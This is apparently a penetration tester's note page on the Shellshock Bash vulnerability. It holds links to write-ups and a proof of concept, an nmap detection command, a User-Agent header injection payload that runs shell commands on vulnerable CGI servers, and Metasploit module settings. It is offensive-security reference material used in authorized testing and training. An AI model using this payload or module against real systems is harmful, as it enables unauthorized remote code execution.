Linux

Shellshock vulnerability

https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdfowasp.org

PPT by owasp

Inside Shellshock: How hackers are using it to exploit systemsThe Cloudflare Blog

walkthrough of the vuln

PoC

https://github.com/opsxcq/exploit-CVE-2014-6271

nmap scan

nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgi

exploitation

User Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'

metasploit

use exploit/multi/http/apache_mod_cgi_bash_env_exec

#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit

FTP

• for FTP you can refer to:

FTP

SSH

• refer this page for ssh:

SSH

Samba

• for samba refer:

Samba (SMB)